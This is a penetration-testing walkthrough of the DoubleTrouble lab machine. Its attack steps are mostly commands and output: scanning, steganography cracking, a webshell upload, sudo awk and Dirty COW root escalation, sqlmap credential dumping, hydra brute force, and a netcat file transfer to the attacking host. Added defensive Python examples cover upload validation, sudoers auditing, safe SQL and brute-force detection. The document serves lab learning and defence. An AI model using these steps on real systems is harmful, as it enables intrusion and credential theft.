nmap -sP 10.80.56.0/24
Attacking host: 10.80.56.101
Target: 10.80.56.178
nmap -p- 10.80.56.178
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -A -n -p 22 10.80.56.178
nmap -A -n -p 80 10.80.56.178
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirsearch -u http://10.80.56.178/
[20:26:21] 200 - 406B - /backups/
[20:26:23] 200 - 0B - /check.php
[20:26:30] 200 - 647B - /images/
[20:26:30] 200 - 2KB - /index.php
[20:26:30] 200 - 2KB - /index.php/login/
[20:26:31] 200 - 762B - /install/index.php?upgrade/
[20:26:31] 200 - 762B - /install/
[20:26:31] 200 - 606B - /js/
[20:26:41] 200 - 338B - /
[20:26:42] 200 - 26B - /robots.txt
[20:26:42] 200 - 461B - /secret/
[20:26:48] 200 - 476B - /uploads/
#Retrieve the key piece of information
wget http://10.80.56.178/secret/doubletrouble.jpg
#Search for known vulnerabilities: there is a file upload vulnerability, but it requires being logged in to the back end
searchsploit qdPM 9.1
#Crack the key information: try reading it with steghide, and find it is password-protected
steghide extract -sf doubletrouble.jpg
#Brute-force the passphrase with stegseek; it succeeds
stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
#Extract the hidden content: it is an account and a password
cat creds.txt
otisrush@localhost.com
otis666
#The vulnerability is in the account avatar upload: a webshell can be uploaded. An error is shown, but the upload still goes through.
#According to the advisory, the official regex was written incorrectly: it was meant to block the upload, but instead it raises an error and does not block it.
#Upload a PHP reverse shell script, then start an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
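The upload bug above comes down to a filename check that lets a PHP file through. The following is an added example (not qdPM's code, and not the author's): a constructed weak check whose pattern is not anchored to the end of the name, beside a hardened check that allowlists one extension, verifies the file's leading bytes, and lets the server pick the stored name. The weak pattern, the magic-byte table and the sample uploads are assumptions for illustration.

```python
import re
import secrets
from pathlib import PurePosixPath

# Constructed illustration (not qdPM's actual code): the check only looks for an
# image extension somewhere in the name, so it is not anchored to the end.
WEAK_PATTERN = re.compile(r".*\.(jpe?g|png|gif)", re.IGNORECASE)

def weak_check(filename):
    """Returns True if the upload would be accepted by the unanchored pattern."""
    # ".*\.(jpe?g|png|gif)" matches the prefix "avatar.jpg" of "avatar.jpg.php",
    # so the PHP file passes and the web server may execute it.
    return WEAK_PATTERN.match(filename) is not None

# Allowlisted extensions with the leading bytes a real file of that type starts with.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

def hardened_check(filename, content):
    """Returns the server-chosen filename to store under, or None to reject."""
    name = PurePosixPath(filename).name.lower()   # drop any directory components
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:           # no double extensions, no dotfiles
        return None
    ext = parts[1]
    magic = ALLOWED_MAGIC.get(ext)
    if magic is None or not content.startswith(magic):
        return None                               # extension not allowed, or content lies
    # Never reuse the client's name: the server picks an unguessable one.
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed sample uploads.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    print(weak_check("avatar.jpg.php"))                  # True: the weak check accepts it
    print(hardened_check("avatar.jpg.php", PHP_BYTES))   # None: rejected
    print(hardened_check("avatar.jpg", JPEG_BYTES))      # random name ending in .jpg
```

Even with the hardened check, the upload directory should not be executable by the web server; the `.htaccess` with `Deny from all` seen later on this box is one way of doing that for Apache 2.2-style configurations.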
#Gather information
cat .htaccess
Order Deny,Allow
Deny from all
#Try privilege escalation: awk can be run as root
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
#Run the escalation command; root obtained
sudo awk 'BEGIN {system("/bin/sh")}'
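The sudo rule above is the kind of misconfiguration a sudoers audit should catch before an attacker does. The following is an added example, not part of the original write-up: it parses `sudo -l` output in the format shown (the page's output is embedded as the sample) and flags rules that need no password, grant `ALL`, set the caller's environment, or name a binary that can execute arbitrary commands. The list of such binaries is an assumption and deliberately short.

```python
import re
from pathlib import PurePosixPath

# The sudo -l output from this box, embedded as constructed sample input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
"""

# Assumed, non-exhaustive list of interpreters and editors that can run
# arbitrary commands when granted through sudo.
SHELL_CAPABLE = {
    "awk", "gawk", "mawk", "sh", "bash", "dash",
    "perl", "python", "python2", "python3", "vi", "vim", "env", "find",
}

# One rule line: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)

def audit_sudo_rules(text):
    """Returns one finding per risky command, each with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m is None:
            continue  # Defaults entries and headers are not rules
        tags = {t.strip(":") for t in m["tags"].split()}
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            binary = PurePosixPath(cmd.split()[0]).name
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted command")
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if binary in SHELL_CAPABLE:
                reasons.append("binary can execute arbitrary commands")
            if "SETENV" in tags:
                reasons.append("caller controls environment")
            if reasons:
                findings.append({"runas": m["runas"].strip(), "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_rules(SUDO_L_OUTPUT):
        print(finding)
```

Run against the output above it reports `/usr/bin/awk` twice over: no password is required and awk can run commands. The fix is to grant only the specific awk invocation that is needed, or to move the task into a script owned by root that takes no user-controlled arguments.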
#Another VM image exists in the root directory: double trouble indeed
doubletrouble.ova
python3 -m http.server 8080
wget http://10.80.56.178:8080/doubletrouble.ova
#On to the second trouble
nmap -sP 10.80.56.0/24
Attacking host: 10.80.56.101
Target: 10.80.56.178
nmap -p- 10.80.56.178
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -A -n -p 22 10.80.56.178
nmap -A -n -p 80 10.80.56.178
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_ 256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
#The home page is a login form with nothing reflected back, so SQL injection is possible; sqlmap shows it is a time-based blind injection
sqlmap -u http://10.80.56.178/index.php --data="uname=admin&psw=12345" -D doubletrouble -T users -C username,password --dump
available databases [2]:
[*] doubletrouble
[*] information_schema
Database: doubletrouble
[1 table]
+-------+
| users |
+-------+
Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
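The dump shows both the injection and the fact that passwords are stored in clear text. The following is an added example, not code from the target or from the author, using an in-memory SQLite database as a stand-in for the site's MySQL: a login routine that splices the POST fields into the SQL string beside one that uses bound parameters and compares a salted PBKDF2 hash. The schema, the hashing parameters and the use of the dumped accounts as sample rows are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data: the two accounts recovered from the dump above.
USERS = [("montreux", "GfsZxc1"), ("clapton", "ZubZub99")]
PBKDF2_ROUNDS = 100_000

def setup_db():
    """In-memory SQLite standing in for the site's MySQL database."""
    conn = sqlite3.connect(":memory:")
    # Vulnerable schema: plaintext passwords, exactly as in the dumped table.
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    # Hardened schema: per-user salt and a PBKDF2 hash instead of the password itself.
    conn.execute(
        "CREATE TABLE users_hashed (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)"
    )
    for user, pw in USERS:
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
        conn.execute("INSERT INTO users_hashed VALUES (?, ?, ?)", (user, salt, digest))
    return conn

def vulnerable_login(conn, uname, psw):
    """Splices the POST fields straight into the SQL text (the bug class sqlmap found)."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{uname}' AND password = '{psw}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def safe_login(conn, uname, psw):
    """Bound parameters keep the input as data; the hash compare is constant-time."""
    row = conn.execute(
        "SELECT username, salt, pw_hash FROM users_hashed WHERE username = ?",
        (uname,),
    ).fetchone()
    if row is None:
        return None
    digest = hashlib.pbkdf2_hmac("sha256", psw.encode(), row[1], PBKDF2_ROUNDS)
    return row[0] if hmac.compare_digest(digest, row[2]) else None

if __name__ == "__main__":
    db = setup_db()
    # A password field of "' OR '1'='1" turns the WHERE clause into a tautology
    # for the vulnerable query and is just a wrong password for the safe one.
    print(vulnerable_login(db, "admin", "' OR '1'='1"))   # a username: authentication bypassed
    print(safe_login(db, "admin", "' OR '1'='1"))         # None
    print(safe_login(db, "clapton", "ZubZub99"))          # clapton
```

With bound parameters no attacker-supplied SQL is ever parsed, so the time-based oracle sqlmap relied on disappears along with the authentication bypass; hashing the stored passwords means that even a successful dump of the table would not hand over reusable credentials, which is what made the SSH step below possible.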
#Got usernames and passwords from the database; try brute-forcing SSH with hydra
hydra -L user.txt -P pass.txt 10.80.56.178 ssh
[22][ssh] host: 10.80.56.178 login: clapton password: ZubZub99
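From the defender's side, the hydra run leaves a distinctive trace in the SSH daemon's auth log: a burst of failed passwords from one address, then an accepted one. The following is an added example, not part of the original write-up: it parses OpenSSH `auth.log` lines, flags a source once it reaches a threshold of failures inside a time window, and flags again if a login then succeeds from that source. The log lines are constructed, and the year attached to syslog timestamps is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log line shape (syslog timestamps carry no year; one is assumed when parsing).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

# Constructed sample log: a burst of failures followed by a success from one address,
# plus one unrelated failure from another address.
SAMPLE_LOG = """\
Jan 10 20:26:40 doubletrouble sshd[1201]: Failed password for root from 10.80.56.50 port 40000 ssh2
Jan 10 20:26:41 doubletrouble sshd[1210]: Failed password for montreux from 10.80.56.101 port 51234 ssh2
Jan 10 20:26:41 doubletrouble sshd[1211]: Failed password for invalid user otisrush from 10.80.56.101 port 51235 ssh2
Jan 10 20:26:42 doubletrouble sshd[1212]: Failed password for clapton from 10.80.56.101 port 51236 ssh2
Jan 10 20:26:42 doubletrouble sshd[1213]: Failed password for montreux from 10.80.56.101 port 51237 ssh2
Jan 10 20:26:43 doubletrouble sshd[1214]: Failed password for clapton from 10.80.56.101 port 51238 ssh2
Jan 10 20:26:43 doubletrouble sshd[1215]: Failed password for montreux from 10.80.56.101 port 51239 ssh2
Jan 10 20:26:44 doubletrouble sshd[1216]: Accepted password for clapton from 10.80.56.101 port 51240 ssh2
"""

def parse_events(text, year=2024):
    """Returns (timestamp, result, user, ip) tuples for every password-auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(text, threshold=5, window_s=60):
    """Flags an IP once it reaches `threshold` failures inside `window_s` seconds,
    and flags again if a login then succeeds from that IP while the burst is recent."""
    findings = []
    recent_fail = defaultdict(list)  # ip -> failure timestamps still inside the window
    for ts, result, user, ip in sorted(parse_events(text), key=lambda e: e[0]):
        window = [t for t in recent_fail[ip] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            window.append(ts)
            if len(window) == threshold:  # fire once, on the failure that crosses the line
                findings.append({"kind": "burst", "ip": ip, "at": ts})
        elif len(window) >= threshold:
            findings.append({"kind": "success_after_burst", "ip": ip, "user": user, "at": ts})
        recent_fail[ip] = window
    return findings

if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

The second finding is the one worth paging on: a success right after a burst is the signature of a guessed password rather than a mistyped one. Rate limiting (fail2ban or sshd's `MaxAuthTries`) reduces the burst, and key-only authentication removes the password channel entirely.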
#Get the first flag
cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNLhnhzhOvRSRJ2fzkWgNfJ0gxrQvFupKVcS8SDAf8GFjsNd9Gy5FgcWSt7s54j+EumUfHVNwupZuMsRYphg/zpTBwUQ4vgBGPbLUqw64tW2OucbidJ5m6QoS0UkMkjmSBKuOAy0c/BdMSLi0f6aYnlH/H9FL0JYk4jLHVawA+h1RfjlDiRBteSDKh7Mqv1RMnRHZE0bzGEMVSTkNEyeMqZbrqguuvBk2RzMHUqzVLVgw91TVPnDRqd02tI/YjECkyp/igp+4ozqPQQ361biMYF62ft7eIN2uHWzXVcb9GvezXIOzXcYmOQ+H88KUqezVMPvHDAzGRWf0pKOAccukH clapton@doubletrouble
#Found a mysterious zip; unpacking it reveals another zip inside that is password-protected
nc 10.80.56.101 1234 < get.zip
#Cracked successfully
zip2john get.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (spammer.zip/creds.txt)
#Got a string; assumed it was another user's password, but it failed
mayer:lionheart
#Check the Linux version
uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
#A search shows Linux kernel 3.2.0 is affected by Dirty COW: https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc dirty.c -o dirty
#Linking fails: crypt and pthread are missing
/tmp/ccztF1Hz.o: In function `generate_password_hash':
exp.c:(.text+0x1e): undefined reference to `crypt'
/tmp/ccztF1Hz.o: In function `main':
exp.c:(.text+0x4cd): undefined reference to `pthread_create'
exp.c:(.text+0x501): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status
#A search shows the fix is to link crypt and pthread with -l
gcc -pthread dirty.c -o dirty -lcrypt
#Run it and, following the prompt, switch to the firefart user to obtain root
cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:
DOUBLETROUBLE: 1 target-machine penetration write-up